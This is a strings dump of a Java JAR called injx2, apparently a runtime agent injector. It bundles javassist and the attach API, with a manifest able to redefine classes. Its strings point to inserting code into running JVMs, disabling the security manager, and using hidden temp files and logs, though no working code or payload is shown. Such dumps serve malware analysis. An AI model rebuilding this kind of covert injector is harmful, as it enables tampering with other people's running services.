0 %z\ux 00000003C669 00000003C669 0 com/sun/tools/UT 00000003C67D 00000003C67D 0 %z\ux 00000003C6BD 00000003C6BD 0 com/sun/tools/attach/UT 00000003C6D8 00000003C6D8 0 %z\ux 00000003C718 00000003C718 0 com/sun/tools/attach/AttachPermission.classUT 00000003C789 00000003C789 0 com/sun/tools/attach/AttachNotSupportedException.classUT 00000003C805 00000003C805 0 com/sun/tools/attach/AgentLoadException.classUT 00000003C878 00000003C878 0 com/sun/tools/attach/AgentInitializationException.classUT 00000003C8F5 00000003C8F5 0 com/sun/tools/attach/spi/UT 00000003C914 00000003C914 0 %z\ux 00000003C954 00000003C954 0 sun/UT 00000003C95E 00000003C95E 0 %z\ux 00000003C99E 00000003C99E 0 sun/tools/UT 00000003C9AE 00000003C9AE 0 %z\ux 00000003C9EE 00000003C9EE 0 sun/jvmstat/UT 00000003CA00 00000003CA00 0 %z\ux 00000003CA40 00000003CA40 0 sun/tools/attach/UT 00000003CA57 00000003CA57 0 1z\ux 00000003CA97 00000003CA97 0 sun/tools/attach/WindowsVirtualMachine.classUT 00000003CB09 00000003CB09 0 sun/tools/attach/WindowsAttachProvider.classUT 00000003CB7B 00000003CB7B 0 sun/tools/attach/HotSpotVirtualMachine.classUT 00000003CBED 00000003CBED 0 sun/tools/attach/WindowsVirtualMachine$PipedInputStream.classUT 00000003CC30 00000003CC30 0 1z\ux 00000003CC70 00000003CC70 0 sun/jvmstat/monitor/UT 00000003CC8A 00000003CC8A 0 %z\ux 00000003CCCA 00000003CCCA 0 sun/jvmstat/perfdata/UT 00000003CCE5 00000003CCE5 0 %z\ux 00000003CD25 00000003CD25 0 sun/jvmstat/monitor/remote/UT 00000003CD46 00000003CD46 0 %z\ux 00000003CD86 00000003CD86 0 sun/jvmstat/perfdata/monitor/UT 00000003CDA9 00000003CDA9 0 %z\ux 00000003CDE9 00000003CDE9 0 sun/jvmstat/perfdata/monitor/protocol/UT 00000003CE15 00000003CE15 0 %z\ux 00000003CE55 00000003CE55 0 sun/jvmstat/perfdata/monitor/v2_0/UT 00000003CE7D 00000003CE7D 0 %z\ux 00000003CEBD 00000003CEBD 0 sun/jvmstat/perfdata/monitor/v2_0/PerfDataBuffer.classUT 00000003CF39 00000003CF39 0 sun/jvmstat/perfdata/monitor/protocol/local/UT 00000003CF6B 00000003CF6B 0 %z\ux 00000003CFAB 00000003CFAB 0 META-INF/services/UT 00000003CFC3 00000003CFC3 0 %z\ux 00000003D003 00000003D003 0 META-INF/services/com.sun.tools.attach.spi.AttachProviderUT 00000003D082 00000003D082 0 META-INF/services/com.sun.tools.internal.xjc.PluginUT 00000003D0FB 00000003D0FB 0 META-INF/services/com.sun.mirror.apt.AnnotationProcessorFactoryUT 00000003D15F 00000003D15F 0 rzB#n 00000003D180 00000003D180 0 META-INF/services/com.sun.jdi.connect.spi.TransportServiceUT 00000003D200 00000003D200 0 META-INF/services/com.sun.jdi.connect.ConnectorUT 00000003D275 00000003D275 0 injx2/javassist/NotFoundException.classUT 00000003D2A2 00000003D2A2 0 #z\ux 00000003D2C2 00000003D2C2 0 bNC7V7 00000003D2E2 00000003D2E2 0 injx2/javassist/JarClassPath.classUT 00000003D30A 00000003D30A 0 #z\ux 00000003D34A 00000003D34A 0 injx2/javassist/DirClassPath.classUT 00000003D372 00000003D372 0 #z\ux File pos Mem pos ID Text ======== ======= == ==== 00000003D3B2 00000003D3B2 0 injx2/javassist/CtPrimitiveType.classUT 00000003D3DD 00000003D3DD 0 #z\ux 00000003D41D 00000003D41D 0 injx2/javassist/CtMethod.classUT 00000003D441 00000003D441 0 #z\ux 00000003D481 00000003D481 0 injx2/javassist/CtMember$Cache.classUT 00000003D4AB 00000003D4AB 0 #z\ux 00000003D4EB 00000003D4EB 0 injx2/javassist/CtMember.classUT 00000003D50F 00000003D50F 0 #z\ux 00000003D54F 00000003D54F 0 injx2/javassist/CtField.classUT 00000003D572 00000003D572 0 #z\ux 00000003D5B2 00000003D5B2 0 injx2/javassist/CtConstructor.classUT 00000003D5DB 00000003D5DB 0 #z\ux 00000003D61B 00000003D61B 0 injx2/javassist/CtClassType.classUT 00000003D642 00000003D642 0 #z\ux 00000003D682 00000003D682 0 injx2/javassist/CtClass.classUT 00000003D6A5 00000003D6A5 0 #z\ux 00000003D6E5 00000003D6E5 0 injx2/javassist/CtBehavior.classUT 00000003D70B 00000003D70B 0 #z\ux 00000003D74B 00000003D74B 0 injx2/javassist/ClassPoolTail.classUT 00000003D774 00000003D774 0 #z\ux 00000003D7B4 00000003D7B4 0 injx2/javassist/ClassPool$1.classUT 00000003D7DB 00000003D7DB 0 #z\ux 00000003D81B 00000003D81B 0 injx2/javassist/ClassPool.classUT 00000003D840 00000003D840 0 #z\ux 00000003D880 00000003D880 0 injx2/javassist/ClassPathList.classUT 00000003D8A9 00000003D8A9 0 #z\ux 00000003D8E9 00000003D8E9 0 injx2/javassist/ClassPath.classUT 00000003D90E 00000003D90E 0 #z\ux 00000003D92E 00000003D92E 0 bN']6O 00000003D94E 00000003D94E 0 injx2/javassist/ClassClassPath.classUT 00000003D978 00000003D978 0 #z\ux 00000003D9B8 00000003D9B8 0 injx2/javassist/bytecode/Utf8Info.classUT 00000003D9E5 00000003D9E5 0 #z\ux 00000003DA25 00000003DA25 0 injx2/javassist/bytecode/StringInfo.classUT 00000003DA54 00000003DA54 0 #z\ux 00000003DA94 00000003DA94 0 injx2/javassist/bytecode/StackMapTable.classUT 00000003DAC6 00000003DAC6 0 #z\ux 00000003DB06 00000003DB06 0 injx2/javassist/bytecode/SourceFileAttribute.classUT 00000003DB3E 00000003DB3E 0 #z\ux 00000003DB7E 00000003DB7E 0 injx2/javassist/bytecode/Opcode.classUT 00000003DBA9 00000003DBA9 0 #z\ux 00000003DBE9 00000003DBE9 0 injx2/javassist/bytecode/NameAndTypeInfo.classUT 00000003DC1D 00000003DC1D 0 #z\ux 00000003DC5D 00000003DC5D 0 injx2/javassist/bytecode/MethodrefInfo.classUT 00000003DC8F 00000003DC8F 0 #z\ux 00000003DCCF 00000003DCCF 0 injx2/javassist/bytecode/MethodInfo.classUT 00000003DCFE 00000003DCFE 0 #z\ux 00000003DD3E 00000003DD3E 0 injx2/javassist/bytecode/MemberrefInfo.classUT 00000003DD70 00000003DD70 0 #z\ux 00000003DDB0 00000003DDB0 0 injx2/javassist/bytecode/LongVector.classUT 00000003DDDF 00000003DDDF 0 #z\ux 00000003DE1F 00000003DE1F 0 injx2/javassist/bytecode/LocalVariableAttribute.classUT 00000003DE5A 00000003DE5A 0 #z\ux 00000003DE9A 00000003DE9A 0 injx2/javassist/bytecode/LineNumberAttribute.classUT 00000003DED2 00000003DED2 0 #z\ux 00000003DF12 00000003DF12 0 injx2/javassist/bytecode/FieldrefInfo.classUT 00000003DF43 00000003DF43 0 #z\ux 00000003DF83 00000003DF83 0 injx2/javassist/bytecode/FieldInfo.classUT 00000003DFB1 00000003DFB1 0 #z\ux 00000003DFD1 00000003DFD1 0 bNB\eHm File pos Mem pos ID Text ======== ======= == ==== 00000003DFF1 00000003DFF1 0 injx2/javassist/bytecode/ExceptionTableEntry.classUT 00000003E029 00000003E029 0 #z\ux 00000003E069 00000003E069 0 injx2/javassist/bytecode/ExceptionTable.classUT 00000003E09C 00000003E09C 0 #z\ux 00000003E0DC 00000003E0DC 0 injx2/javassist/bytecode/ExceptionsAttribute.classUT 00000003E114 00000003E114 0 #z\ux 00000003E154 00000003E154 0 injx2/javassist/bytecode/Descriptor.classUT 00000003E183 00000003E183 0 #z\ux 00000003E1C3 00000003E1C3 0 injx2/javassist/bytecode/ConstPool.classUT 00000003E1F1 00000003E1F1 0 #z\ux 00000003E231 00000003E231 0 injx2/javassist/bytecode/ConstInfo.classUT 00000003E25F 00000003E25F 0 #z\ux 00000003E29F 00000003E29F 0 injx2/javassist/bytecode/CodeAttribute.classUT 00000003E2D1 00000003E2D1 0 #z\ux 00000003E311 00000003E311 0 injx2/javassist/bytecode/ClassInfo.classUT 00000003E33F 00000003E33F 0 #z\ux 00000003E37F 00000003E37F 0 injx2/javassist/bytecode/ClassFile.classUT 00000003E3AD 00000003E3AD 0 #z\ux 00000003E3ED 00000003E3ED 0 injx2/javassist/bytecode/AttributeInfo.classUT 00000003E41F 00000003E41F 0 #z\ux 00000003E45F 00000003E45F 0 com/sun/tools/attach/VirtualMachineDescriptor.classUT 00000003E4B8 00000003E4B8 0 bNw7j 00000003E4D8 00000003E4D8 0 com/sun/tools/attach/VirtualMachine.classUT 00000003E547 00000003E547 0 com/sun/tools/attach/spi/AttachProvider.classUT 00000003E5BA 00000003E5BA 0 sun/tools/attach/HotSpotAttachProvider.classUT 00000003E62C 00000003E62C 0 sun/tools/attach/HotSpotAttachProvider$HotSpotVirtualMachineDescriptor.classUT 00000003E6BE 00000003E6BE 0 sun/jvmstat/monitor/VmIdentifier.classUT 00000003E72A 00000003E72A 0 sun/jvmstat/monitor/StringMonitor.classUT 00000003E797 00000003E797 0 sun/jvmstat/monitor/MonitorException.classUT 00000003E807 00000003E807 0 sun/jvmstat/monitor/MonitoredVmUtil.classUT 00000003E856 00000003E856 0 bNm98Lm 00000003E876 00000003E876 0 sun/jvmstat/monitor/MonitoredVm.classUT 00000003E8E1 00000003E8E1 0 sun/jvmstat/monitor/MonitoredHost.classUT 00000003E94E 00000003E94E 0 sun/jvmstat/monitor/Monitor.classUT 00000003E9B5 00000003E9B5 0 sun/jvmstat/monitor/LongMonitor.classUT 00000003EA20 00000003EA20 0 sun/jvmstat/monitor/IntegerMonitor.classUT 00000003EA8E 00000003EA8E 0 sun/jvmstat/monitor/HostIdentifier.classUT 00000003EAFC 00000003EAFC 0 sun/jvmstat/monitor/ByteArrayMonitor.classUT 00000003EB6C 00000003EB6C 0 sun/jvmstat/monitor/AbstractMonitor.classUT 00000003EBDB 00000003EBDB 0 sun/jvmstat/monitor/remote/BufferedMonitoredVm.classUT 00000003EC55 00000003EC55 0 sun/jvmstat/perfdata/monitor/SyntaxException.classUT 00000003ECCD 00000003ECCD 0 sun/jvmstat/perfdata/monitor/PerfStringVariableMonitor.classUT 00000003ED4F 00000003ED4F 0 sun/jvmstat/perfdata/monitor/PerfStringMonitor.classUT 00000003EDA9 00000003EDA9 0 bNAnT:{ 00000003EDC9 00000003EDC9 0 sun/jvmstat/perfdata/monitor/PerfStringConstantMonitor.classUT 00000003EE4B 00000003EE4B 0 sun/jvmstat/perfdata/monitor/PerfLongMonitor.classUT 00000003EEC3 00000003EEC3 0 sun/jvmstat/perfdata/monitor/PerfIntegerMonitor.classUT 00000003EF1E 00000003EF1E 0 bNOwSG 00000003EF3E 00000003EF3E 0 sun/jvmstat/perfdata/monitor/PerfDataBufferImpl.classUT 00000003EFB9 00000003EFB9 0 sun/jvmstat/perfdata/monitor/PerfByteArrayMonitor.classUT 00000003F036 00000003F036 0 sun/jvmstat/perfdata/monitor/MonitorVersionException.classUT 00000003F0B6 00000003F0B6 0 sun/jvmstat/perfdata/monitor/MonitorTypeException.classUT 00000003F133 00000003F133 0 sun/jvmstat/perfdata/monitor/MonitorStructureException.classUT 00000003F1B5 00000003F1B5 0 sun/jvmstat/perfdata/monitor/MonitorDataException.classUT 00000003F232 00000003F232 0 sun/jvmstat/perfdata/monitor/CountedTimerTask.classUT 00000003F2AB 00000003F2AB 0 sun/jvmstat/perfdata/monitor/AliasFileParser.classUT 00000003F323 00000003F323 0 sun/jvmstat/perfdata/monitor/AliasFileParser$Token.classUT 00000003F3A1 00000003F3A1 0 sun/jvmstat/perfdata/monitor/AbstractPerfDataBufferPrologue.classUT 00000003F428 00000003F428 0 sun/jvmstat/perfdata/monitor/AbstractPerfDataBuffer.classUT 00000003F4A7 00000003F4A7 0 sun/jvmstat/perfdata/monitor/AbstractMonitoredVm.classUT File pos Mem pos ID Text ======== ======= == ==== 00000003F523 00000003F523 0 sun/jvmstat/perfdata/monitor/v2_0/TypeCode.classUT 00000003F599 00000003F599 0 sun/jvmstat/perfdata/monitor/v2_0/PerfDataBufferPrologue.classUT 00000003F61D 00000003F61D 0 sun/jvmstat/perfdata/monitor/protocol/local/PerfDataFile.classUT 00000003F6A1 00000003F6A1 0 sun/jvmstat/perfdata/monitor/protocol/local/PerfDataBuffer.classUT 00000003F727 00000003F727 0 sun/jvmstat/perfdata/monitor/protocol/local/MonitoredHostProvider.classUT 00000003F794 00000003F794 0 bN0e0 00000003F7B4 00000003F7B4 0 sun/jvmstat/perfdata/monitor/protocol/local/MonitoredHostProvider$NotifierTask.classUT 00000003F84E 00000003F84E 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager.classUT 00000003F8D4 00000003F8D4 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager$3.classUT 00000003F95C 00000003F95C 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager$2.classUT 00000003F9E4 00000003F9E4 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager$1.classUT 00000003FA6C 00000003FA6C 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalMonitoredVm.classUT 00000003FAF4 00000003FAF4 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalMonitoredVm$NotifierTask.classUT 00000003FB89 00000003FB89 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalEventTimer.classUT 000000006D07 000000006D07 0 Td\g[i]f 000000006E9D 000000006E9D 0 naoeqf 00000000001E 00000000001E 0 META-INF/UT 000000000031 000000000031 0 %z\ux 000000000061 000000000061 0 META-INF/MANIFEST.MFManifest-Version: 1.0 00000000008C 00000000008C 0 Ant-Version: Apache Ant 1.9.7 0000000000AB 0000000000AB 0 Created-By: 1.8.0_144-b01 (Oracle Corporation) 0000000000DB 0000000000DB 0 Class-Path: lib/tools.jar lib/lib/ 0000000000FF 0000000000FF 0 X-COMMENT: Main-Class will be added automatically by build 00000000013B 00000000013B 0 Main-Class: injx2.INJX 000000000153 000000000153 0 Agent-Class: injx2.Agent 00000000016D 00000000016D 0 Can-Retransform-Classes: true 00000000018C 00000000018C 0 Can-Redefine-Classes: true 0000000001C8 0000000001C8 0 conf/PK 0000000001EB 0000000001EB 0 dynamic/PK 000000000211 000000000211 0 injx2/UT 000000000221 000000000221 0 #z\ux 000000000251 000000000251 0 injx2/Agent$KRunnable.class 0000000003A7 0000000003A7 0 <init> 0000000003BD 0000000003BD 0 LineNumberTable 0000000003CF 0000000003CF 0 LocalVariableTable 0000000003EA 0000000003EA 0 KRunnable 0000000003F7 0000000003F7 0 InnerClasses 000000000406 000000000406 0 Linjx2/Agent$KRunnable; 00000000042B 00000000042B 0 Ljava/lang/Exception; 000000000443 000000000443 0 input 00000000044B 00000000044B 0 Ljava/io/FileInputStream; 000000000466 000000000466 0 origbytes 000000000478 000000000478 0 definition 000000000484 000000000484 0 &Ljava/lang/instrument/ClassDefinition; 0000000004B4 0000000004B4 0 targetClassInternalForm 0000000004CE 0000000004CE 0 Ljava/lang/String; 0000000004EC 0000000004EC 0 inscount 0000000004F7 0000000004F7 0 action 000000000508 000000000508 0 Ljava/io/File; 00000000051E 00000000051E 0 spaths 000000000527 000000000527 0 [Ljava/lang/String; 00000000053D 00000000053D 0 StackMapTable 00000000055F 00000000055F 0 SourceFile 00000000056C 00000000056C 0 Agent.java 000000000586 000000000586 0 java/lang/Exception 00000000059C 00000000059C 0 java/lang/String 0000000005AF 0000000005AF 0 /dev/shm/.AgentCli 0000000005C4 0000000005C4 0 /tmp/.AgentCli 0000000005D5 0000000005D5 0 c:\windows\temp\.AgentCli 0000000005F1 0000000005F1 0 c:\temp\.AgentCli File pos Mem pos ID Text ======== ======= == ==== 000000000605 000000000605 0 java/lang/StringBuilder 00000000061F 00000000061F 0 APPDATA 000000000636 000000000636 0 \.AgentCli 000000000648 000000000648 0 java/io/File 000000000666 000000000666 0 java/io/FileInputStream 000000000697 000000000697 0 Restoring: 0000000006E9 0000000006E9 0 $java/lang/instrument/ClassDefinition 00000000072D 00000000072D 0 java/io/PrintWriter 0000000007AA 0000000007AA 0 injx2/Agent$KRunnable 0000000007C2 0000000007C2 0 java/lang/Object 0000000007D5 0000000007D5 0 java/lang/Runnable 0000000007EA 0000000007EA 0 java/lang/Thread 0000000007FD 0000000007FD 0 sleep 00000000080C 00000000080C 0 java/lang/System 00000000081F 00000000081F 0 getenv 000000000827 000000000827 0 &(Ljava/lang/String;)Ljava/lang/String; 000000000851 000000000851 0 append 000000000859 000000000859 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 00000000088A 00000000088A 0 toString 000000000895 000000000895 0 ()Ljava/lang/String; 0000000008AC 0000000008AC 0 (Ljava/lang/String;)V 0000000008C4 0000000008C4 0 exists 0000000008D3 0000000008D3 0 isDirectory 0000000008E1 0000000008E1 0 (Ljava/io/File;)V 000000000902 000000000902 0 delete 00000000090B 00000000090B 0 injx2/Global 000000000921 000000000921 0 Ljava/io/BufferedWriter; 00000000093C 00000000093C 0 java/io/BufferedWriter 000000000955 000000000955 0 write 00000000095D 00000000095D 0 flush 000000000965 000000000965 0 injx2/Agent 000000000973 000000000973 0 instrumentedClassName 00000000098B 00000000098B 0 toeditcount 000000000999 000000000999 0 toedit 0000000009A2 0000000009A2 0 [Ljava/lang/Class; 0000000009B7 0000000009B7 0 java/lang/Class 0000000009C9 0000000009C9 0 getName 0000000009D3 0000000009D3 0 equals 0000000009DC 0000000009DC 0 (Ljava/lang/Object;)Z 0000000009F4 0000000009F4 0 Ljava/util/Hashtable; 000000000A0C 000000000A0C 0 java/util/Hashtable 000000000A27 000000000A27 0 &(Ljava/lang/Object;)Ljava/lang/Object; 000000000A51 000000000A51 0 clone 000000000A59 000000000A59 0 ()Ljava/lang/Object; 000000000A70 000000000A70 0 (Ljava/lang/Class;[B)V 000000000A89 000000000A89 0 access$000 000000000A95 000000000A95 0 (()Ljava/lang/instrument/Instrumentation; 000000000AC0 000000000AC0 0 $java/lang/instrument/Instrumentation 000000000AE8 000000000AE8 0 redefineClasses 000000000AF9 000000000AF9 0 *([Ljava/lang/instrument/ClassDefinition;)V 000000000B27 000000000B27 0 getMessage 000000000B34 000000000B34 0 (Ljava/io/Writer;)V 000000000B4A 000000000B4A 0 printStackTrace 000000000B5C 000000000B5C 0 (Ljava/io/PrintWriter;)V 000000000B77 000000000B77 0 chashes 000000000B81 000000000B81 0 hashes2 000000000B8B 000000000B8B 0 chashes2 000000000B96 000000000B96 0 instrumentedMethodName 000000000BAF 000000000BAF 0 instrumentedConstructorName 000000000BCD 000000000BCD 0 instrumentedArgsMap File pos Mem pos ID Text ======== ======= == ==== 000000000BE3 000000000BE3 0 acodeinsert 000000000BF1 000000000BF1 0 bcodeinsert 000000000BFF 000000000BFF 0 close 000000000C07 000000000C07 0 verpatch 000000000C12 000000000C12 0 scandyna 000000000C1D 000000000C1D 0 access$100 000000000C2A 000000000C2A 0 access$200 000000000C36 000000000C36 0 haverunya 000000000C43 000000000C43 0 runya 000000000C4B 000000000C4B 0 hashes3 000000000C55 000000000C55 0 chashes3 00000000118F 00000000118F 0 injx2/Agent.class 0000000015E0 0000000015E0 0 KRunnable 0000000015ED 0000000015ED 0 InnerClasses 000000001603 000000001603 0 Ljava/util/Properties; 00000000161C 00000000161C 0 instrumentedClassName 000000001634 000000001634 0 [Ljava/lang/String; 00000000164A 00000000164A 0 instrumentedMethodName 000000001663 000000001663 0 instrumentedConstructorName 000000001681 000000001681 0 instrumentedArgsMap 000000001697 000000001697 0 acodeinsert 0000000016A5 0000000016A5 0 bcodeinsert 0000000016B3 0000000016B3 0 instrumentit 0000000016C2 0000000016C2 0 toedit 0000000016CB 0000000016CB 0 [Ljava/lang/Class; 0000000016E0 0000000016E0 0 toeditcount 0000000016F2 0000000016F2 0 allLoadedClasses 000000001705 000000001705 0 cPool 00000000170D 00000000170D 0 Linjx2/javassist/ClassPool; 00000000172B 00000000172B 0 conffile 000000001736 000000001736 0 Ljava/lang/String; 00000000174B 00000000174B 0 global 000000001754 000000001754 0 hashes 00000000175D 00000000175D 0 chashes 000000001767 000000001767 0 hashes2 000000001771 000000001771 0 chashes2 00000000177C 00000000177C 0 hashes3 000000001786 000000001786 0 chashes3 000000001791 000000001791 0 disablesec 00000000179E 00000000179E 0 verpatch 0000000017A9 0000000017A9 0 detach 0000000017B1 0000000017B1 0 haverunya 0000000017BE 0000000017BE 0 otroval 0000000017C8 0000000017C8 0 instrumentation 0000000017D9 0000000017D9 0 &Ljava/lang/instrument/Instrumentation; 000000001803 000000001803 0 paths 00000000180B 00000000180B 0 cpaths 000000001814 000000001814 0 <init> 00000000182A 00000000182A 0 LineNumberTable 00000000183C 00000000183C 0 LocalVariableTable 000000001858 000000001858 0 Linjx2/Agent; 000000001868 000000001868 0 runya 000000001870 000000001870 0 concatenate 00000000187D 00000000187D 0 ;([Ljava/lang/Object;[Ljava/lang/Object;)[Ljava/lang/Object; 0000000018C0 0000000018C0 0 [Ljava/lang/Object; 0000000018EC 0000000018EC 0 LocalVariableTypeTable 000000001905 000000001905 0 [TClass; 00000000190F 00000000190F 0 Signature 00000000191B 00000000191B 0 4<Class:Ljava/lang/Object;>([TClass;[TClass;)[TClass; 000000001953 000000001953 0 allclass File pos Mem pos ID Text ======== ======= == ==== 00000000196A 00000000196A 0 Ljava/lang/Exception; 000000001987 000000001987 0 StackMapTable 00000000199A 00000000199A 0 checkinstance 0000000019A9 0000000019A9 0 ,(Ljava/lang/ClassLoader;Ljava/lang/String;)V 0000000019D9 0000000019D9 0 VALUES3 0000000019E3 0000000019E3 0 Ljava/util/Set; 0000000019F5 0000000019F5 0 cloader 0000000019FF 0000000019FF 0 Ljava/lang/ClassLoader; 000000001A19 000000001A19 0 lookfor 000000001A23 000000001A23 0 insta 000000001A2A 000000001A2A 0 #Ljava/util/Set<Ljava/lang/String;>; 000000001A51 000000001A51 0 patchall 000000001A5C 000000001A5C 0 loaded 000000001A65 000000001A65 0 inscount 000000001A6F 000000001A6F 0 container 000000001A7C 000000001A7C 0 mclassloader 000000001A96 000000001A96 0 Ljava/io/IOException; 000000001AAE 000000001AAE 0 argsplit 000000001AC5 000000001AC5 0 [Linjx2/javassist/CtClass; 000000001AE1 000000001AE1 0 signature 000000001B03 000000001B03 0 definition 000000001B0F 000000001B0F 0 &Ljava/lang/instrument/ClassDefinition; 000000001B39 000000001B39 0 ctClass 000000001B43 000000001B43 0 Linjx2/javassist/CtClass; 000000001B66 000000001B66 0 [Linjx2/javassist/CtMethod; 000000001B84 000000001B84 0 ctClassMethod 000000001B94 000000001B94 0 Linjx2/javassist/CtMethod; 000000001BB1 000000001BB1 0 ctConstructors 000000001BC1 000000001BC1 0 [Linjx2/javassist/CtConstructor; 000000001BF0 000000001BF0 0 someinject 000000001C1B 000000001C1B 0 loadconf 000000001C2B 000000001C2B 0 input 000000001C33 000000001C33 0 Ljava/io/FileInputStream; 000000001C4F 000000001C4F 0 porthttp 000000001C5A 000000001C5A 0 counter 000000001C67 000000001C67 0 setStaticValue 000000001C77 000000001C77 0 9(Ljava/lang/String;Ljava/lang/String;Ljava/lang/Object;)V 000000001CB3 000000001CB3 0 className 000000001CBF 000000001CBF 0 fieldName 000000001CCC 000000001CCC 0 newValue 000000001CD7 000000001CD7 0 Ljava/lang/Object; 000000001CEC 000000001CEC 0 field 000000001CF4 000000001CF4 0 Ljava/lang/reflect/Field; 000000001D10 000000001D10 0 oldValue 000000001D1B 000000001D1B 0 Exceptions 000000001D37 000000001D37 0 appendalldir 000000001D45 000000001D45 0 ,(Ljava/io/File;Linjx2/javassist/ClassPool;)V 000000001D74 000000001D74 0 fileEntry 000000001D81 000000001D81 0 Ljava/io/File; 000000001D99 000000001D99 0 [Ljava/io/File; 000000001DB7 000000001DB7 0 folder 000000001DC9 000000001DC9 0 getClassResource 000000001DDB 000000001DDB 0 %(Ljava/lang/Class;)Ljava/lang/String; 000000001E04 000000001E04 0 klass 000000001E0C 000000001E0C 0 Ljava/lang/Class; 000000001E20 000000001E20 0 Ljava/lang/Class<*>; 000000001E39 000000001E39 0 ((Ljava/lang/Class<*>;)Ljava/lang/String; 000000001E65 000000001E65 0 IgetClassResource 000000001E78 000000001E78 0 =(Ljava/lang/ClassLoader;Ljava/lang/String;)Ljava/lang/String; 000000001EBF 000000001EBF 0 Ljava/net/URL; File pos Mem pos ID Text ======== ======= == ==== 000000001ED7 000000001ED7 0 VALUES 000000001EE6 000000001EE6 0 insertpaths 000000001EF3 000000001EF3 0 0(Ljava/lang/String;Linjx2/javassist/ClassPool;)V 000000001F27 000000001F27 0 pfolder 000000001F31 000000001F31 0 startagent 000000001F3D 000000001F3D 0 ;(Ljava/lang/String;Ljava/lang/instrument/Instrumentation;)V 000000001F7B 000000001F7B 0 agentArgs 000000001F8F 000000001F8F 0 errwrite 000000001F9A 000000001F9A 0 Ljava/io/PrintStream; 000000001FB1 000000001FB1 0 agentmain 000000001FBE 000000001FBE 0 bootstrapLoader 000000001FD0 000000001FD0 0 Ljava/net/URISyntaxException; 000000001FF0 000000001FF0 0 agentclasses 000000001FFF 000000001FFF 0 Ljava/util/jar/JarFile; 000000002022 000000002022 0 access$000 00000000202E 00000000202E 0 (()Ljava/lang/instrument/Instrumentation; 00000000205A 00000000205A 0 access$100 000000002067 000000002067 0 access$200 000000002074 000000002074 0 <clinit> 00000000207F 00000000207F 0 SourceFile 00000000208C 00000000208C 0 Agent.java 000000002114 000000002114 0 java/lang/Exception 00000000212A 00000000212A 0 java/util/HashSet 000000002195 000000002195 0 java/lang/StringBuilder 0000000021AF 0000000021AF 0 Class loaded: 0000000021D8 0000000021D8 0 injx2. 0000000021EB 0000000021EB 0 javassist. 0000000021FD 0000000021FD 0 .class 00000000221E 00000000221E 0 .jar! 00000000222D 00000000222D 0 .jar/ 00000000223C 00000000223C 0 file: 000000002255 000000002255 0 (unknown) 000000002263 000000002263 0 ERRORCR: 00000000227F 00000000227F 0 INJ: 00000000228E 00000000228E 0 java/io/IOException 0000000022A4 0000000022A4 0 injx2/Agent 0000000022CC 0000000022CC 0 java/util/Hashtable 0000000022FE 0000000022FE 0 java/io/ByteArrayInputStream 00000000234B 00000000234B 0 UNDECLARED 00000000236F 00000000236F 0 Method: 00000000238D 00000000238D 0 Argument: 0000000023A4 0000000023A4 0 Signature: 0000000023BF 0000000023BF 0 Match! 0000000023F8 0000000023F8 0 $java/lang/instrument/ClassDefinition 00000000242D 00000000242D 0 Injected: 00000000243A 00000000243A 0 No code to inject! 00000000244F 00000000244F 0 "Error: Native or Abstract method! 000000002475 000000002475 0 Error: 00000000247F 00000000247F 0 java/io/PrintWriter 00000000249F 00000000249F 0 java/lang/Class 0000000024B1 0000000024B1 0 java/lang/String 0000000024C4 0000000024C4 0 java/io/FileInputStream 0000000024F9 0000000024F9 0 65413 000000002512 000000002512 0 runonload 000000002524 000000002524 0 disablesecurity 000000002544 000000002544 0 verbose 000000002551 000000002551 0 logoutput 000000002563 000000002563 0 stdout 00000000256C 00000000256C 0 java/io/BufferedWriter 000000002585 000000002585 0 java/io/OutputStreamWriter File pos Mem pos ID Text ======== ======= == ==== 0000000025AC 0000000025AC 0 java/io/FileWriter 0000000025C6 0000000025C6 0 Started... 0000000025D4 0000000025D4 0 class 0000000025DC 0000000025DC 0 method 0000000025EA 0000000025EA 0 constructor 0000000025F8 0000000025F8 0 instrument 000000002605 000000002605 0 endcode 00000000260E 00000000260E 0 startcode 00000000261B 00000000261B 0 Class: 000000002624 000000002624 0 Method: 000000002631 000000002631 0 injx2.Agent 000000002665 000000002665 0 Append classpath: 000000002695 000000002695 0 Location: 0000000026A7 0000000026A7 0 java/io/File 0000000026CA 0000000026CA 0 java/io/PrintStream 0000000026E0 0000000026E0 0 java/io/FileOutputStream 0000000026FB 0000000026FB 0 C:\windows\temp\logerrdet2.txt 000000002726 000000002726 0 java.lang.System 000000002739 000000002739 0 security 000000002749 000000002749 0 X_X... 000000002753 000000002753 0 java/lang/Thread 000000002766 000000002766 0 injx2/Agent$KRunnable 000000002797 000000002797 0 java/util/jar/JarFile 0000000027E4 0000000027E4 0 $java/lang/instrument/Instrumentation 000000002811 000000002811 0 java/lang/Object 00000000282C 00000000282C 0 java/net/URISyntaxException 00000000284A 00000000284A 0 java/util/Properties 00000000287A 00000000287A 0 java/lang/ClassLoader 000000002892 000000002892 0 injx2/javassist/CtClass 0000000028AC 0000000028AC 0 injx2/javassist/CtMethod 0000000028C7 0000000028C7 0 java/lang/SecurityException 0000000028E5 0000000028E5 0 java/lang/NoSuchFieldException 000000002905 000000002905 0 java/lang/ClassNotFoundException 000000002928 000000002928 0 "java/lang/IllegalArgumentException 00000000294D 00000000294D 0 java/lang/IllegalAccessException 000000002971 000000002971 0 injx2/javassist/ClassPool 00000000298D 00000000298D 0 java/util/Set 00000000299D 00000000299D 0 java/net/URL 0000000029AC 0000000029AC 0 getClass 0000000029B7 0000000029B7 0 ()Ljava/lang/Class; 0000000029CD 0000000029CD 0 getComponentType 0000000029E0 0000000029E0 0 java/lang/reflect/Array 0000000029FA 0000000029FA 0 newInstance 000000002A07 000000002A07 0 &(Ljava/lang/Class;I)Ljava/lang/Object; 000000002A31 000000002A31 0 java/lang/System 000000002A43 000000002A43 0 arraycopy 000000002A4F 000000002A4F 0 *(Ljava/lang/Object;ILjava/lang/Object;II)V 000000002A7D 000000002A7D 0 getAllLoadedClasses 000000002A93 000000002A93 0 ()[Ljava/lang/Class; 000000002AAA 000000002AAA 0 getSystemClassLoader 000000002AC1 000000002AC1 0 ()Ljava/lang/ClassLoader; 000000002ADD 000000002ADD 0 getInitiatedClasses 000000002AF2 000000002AF2 0 +(Ljava/lang/ClassLoader;)[Ljava/lang/Class; 000000002B20 000000002B20 0 getParent 000000002B2D 